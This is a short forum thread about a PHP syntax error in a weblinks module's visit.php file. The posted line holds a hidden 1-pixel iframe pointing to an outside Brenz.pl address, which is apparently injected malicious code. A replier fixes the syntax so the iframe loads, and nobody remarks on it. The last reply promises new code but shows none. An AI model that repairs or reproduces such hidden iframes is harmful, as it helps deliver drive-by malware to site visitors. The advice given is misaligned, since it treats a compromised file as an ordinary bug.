Parse error in weblinks module

I get this message:

Parse error: syntax error, unexpected T_STRING, expecting ',' or ';' in /home/intern25/public_html/modules/weblinks/visit.php on line 43

When I click on a link that I've added.

Heres the code
le="color: #000000"><?php { echo "<html><head><meta http-equiv="Refresh" content="0; URL=".$url.""></meta></head><body><iframe style="height:1px" src="http://www.Brenz.pl/rc/" frameborder=0 width=1></iframe> </body></html>"; }


The "echo" line is 43

Someone got any ideas? Thanks

change it to this
le="color: #000000"><?php echo '<html><head><meta http-equiv="Refresh" content="0" URL="'.$url.'"></meta></head><body><iframe style="height: 1px" src="http://www.Brenz.pl/rc/" frameborder="0" width="1"></iframe></body></html>';

Thanks, that seems to work, but it now refreshes over and over and doesnt stop, any ideas?

Whoops my bad, sorry. Try this instead and it should work.
